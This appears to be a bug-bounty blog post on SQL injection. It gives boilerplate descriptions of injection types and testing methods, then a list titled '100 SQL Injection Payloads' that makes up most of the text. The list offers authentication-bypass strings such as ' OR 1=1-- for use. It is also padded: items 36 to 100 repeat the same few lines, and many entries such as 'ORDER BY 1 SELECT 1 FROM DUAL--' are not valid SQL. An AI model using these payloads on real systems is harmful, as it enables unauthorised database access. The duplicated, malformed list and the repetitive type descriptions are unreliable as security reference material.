SQL Injection | Bug Bounty

What is SQL Injection

SQL Injection is a type of attack used to manipulate and extract data from a database by exploiting vulnerabilities in the underlying SQL code. It is a type of code injection attack that targets data-driven applications and can be used to gain access to a database, modify data, or delete data. SQL Injection attacks can be used to bypass authentication, access restricted data, and even execute malicious code.

The most common way to perform an SQL Injection attack is to send malicious input to an application or website that is then used to construct a malicious SQL query. The malicious query can then be used to retrieve data from the database, modify data, or even delete data. Attackers can also use SQL Injection to gain access to the underlying operating system or to upload malware.

SQL Injection attacks can be prevented by using prepared statements, parameterized queries, and stored procedures. Input validation should also be performed to ensure that malicious data is not sent to the application or website. Developers should also ensure that all user-provided input is sanitized and properly escaped to prevent malicious SQL Injection attacks from occurring.

Type Of SQL Injection

1. Error-Based SQL Injection: Error-Based SQL Injection is a type of attack used to extract data from a vulnerable database. This type of attack involves sending a malicious SQL query to the application or website that is then used to construct a malicious SQL query. The malicious query will then return an error message, depending on the data in the database.

2. Union-Based SQL Injection: Union-Based SQL Injection is a type of attack used to extract data from a vulnerable database. This type of attack involves sending a malicious SQL query to the application or website that is then used to construct a malicious SQL query. The malicious query will then return a union of two or more tables, depending on the data in the database.

3. Blind SQL Injection: Blind SQL Injection is a type of attack used to extract data from a vulnerable database. This type of attack involves sending a malicious SQL query to the application or website that is then used to construct a malicious SQL query. The malicious query will then return a true or false value, depending on the data in the database.

4. Inferential SQL Injection: Inferential SQL Injection is a type of attack used to extract data from a vulnerable database. This type of attack involves sending a malicious SQL query to the application or website that is then used to construct a malicious SQL query. The malicious query will then return a response after a certain amount of time, depending on the data in the database.

5. Out-of-Band SQL Injection: Out-of-Band SQL Injection is a type of attack used to extract data from a vulnerable database. This type of attack involves sending a malicious SQL query to the application or website that is then used to construct a malicious SQL query. The malicious query will then return a response over an out-of-band channel, such as HTTP or DNS, depending on the data in the database.

How to Find SQL Injection Vulnerabilities?

1. Manual Testing: Manual testing is one of the most effective ways to find SQL injection vulnerabilities. This involves manually analyzing the code of the application and looking for places where user input is being used to construct SQL queries. If there is no input validation or sanitization in place, then there is a risk of SQL Injection.

2. Automated Testing: Automated testing is another great way to identify SQL injection vulnerabilities. Automated testing tools can be used to scan an application or website for vulnerabilities and alert the user if any potential risks are identified.

3. Source Code Review: Source code reviews are an effective way to identify potential SQL injection vulnerabilities. This involves manually analyzing the source code of an application or website and looking for places where user input is being used to construct SQL queries. These places should then be thoroughly reviewed to ensure that proper input validation and sanitization are being performed.

Where to find SQL Injection Vulnerabilities?

SQL injection vulnerabilities can be found in any application or website that uses a SQL database to store data. This includes web applications, mobile applications, and desktop applications. When analyzing an application for SQL injection vulnerabilities, it is important to look for places where user input is being used to construct SQL queries. If there is no input validation or sanitization in place, then there is a risk of SQL Injection.

100 SQL Injection Payloads

1. ' OR 1=1--
2. ' OR 'a'='a
3. " OR "a"="a
4. ' OR 1=1 LIMIT 1--
5. ' OR 'a'='a' LIMIT 1--
6. " OR "a"="a" LIMIT 1--
7. ' OR 1=1-- -
8. ' OR 1=1#
9. ' OR 1=1/*
10. ' OR 'a'='a'--
11. " OR "a"="a"--
12. ' OR 1=1 ORDER BY 1--
13. ' OR 'a'='a' ORDER BY 1--
14. " OR "a"="a" ORDER BY 1--
15. ' OR 1=1 GROUP BY 1--
16. ' OR 'a'='a' GROUP BY 1--
17. " OR "a"="a" GROUP BY 1--
18. ' OR 1=1 UNION SELECT 1--
19. ' OR 'a'='a' UNION SELECT 1--
20. " OR "a"="a" UNION SELECT 1--
21. ' OR 1=1 HAVING 1=1--
22. ' OR 'a'='a' HAVING 1=1--
23. " OR "a"="a" HAVING 1=1--
24. ' OR 1=1 ORDER BY 1 SELECT 1--
25. ' OR 'a'='a' ORDER BY 1 SELECT 1--
26. " OR "a"="a" ORDER BY 1 SELECT 1--
27. ' OR 1=1 GROUP BY 1 SELECT 1--
28. ' OR 'a'='a' GROUP BY 1 SELECT 1--
29. " OR "a"="a" GROUP BY 1 SELECT 1--
30. ' OR 1=1 UNION ALL SELECT 1--
31. ' OR 'a'='a' UNION ALL SELECT 1--
32. " OR "a"="a" UNION ALL SELECT 1--
33. ' OR 1=1 HAVING 1=1 SELECT 1--
34. ' OR 'a'='a' HAVING 1=1 SELECT 1--
35. " OR "a"="a" HAVING 1=1 SELECT 1--
36. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
37. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
38. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
39. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
40. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
41. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
42. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
43. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
44. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
45. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
46. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
47. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
48. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
49. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
50. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
51. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
52. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
53. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
54. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
55. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
56. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
57. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
58. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
59. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
60. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
61. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
62. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
63. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
64. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
65. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
66. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
67. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
68. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
69. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
70. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
71. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
72. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
73. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
74. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
75. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
76. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
77. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
78. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
79. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
80. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
81. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
82. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
83. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
84. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
85. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
86. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
87. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
88. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--
89. " OR "a"="a" GROUP BY 1 SELECT 1 FROM DUAL--
90. ' OR 1=1 UNION ALL SELECT 1 FROM DUAL--
91. ' OR 'a'='a' UNION ALL SELECT 1 FROM DUAL--
92. " OR "a"="a" UNION ALL SELECT 1 FROM DUAL--
93. ' OR 1=1 HAVING 1=1 SELECT 1 FROM DUAL--
94. ' OR 'a'='a' HAVING 1=1 SELECT 1 FROM DUAL--
95. " OR "a"="a" HAVING 1=1 SELECT 1 FROM DUAL--
96. ' OR 1=1 ORDER BY 1 SELECT 1 FROM DUAL--
97. ' OR 'a'='a' ORDER BY 1 SELECT 1 FROM DUAL--
98. " OR "a"="a" ORDER BY 1 SELECT 1 FROM DUAL--
99. ' OR 1=1 GROUP BY 1 SELECT 1 FROM DUAL--
100. ' OR 'a'='a' GROUP BY 1 SELECT 1 FROM DUAL--

Tags: , ,

Leave a Reply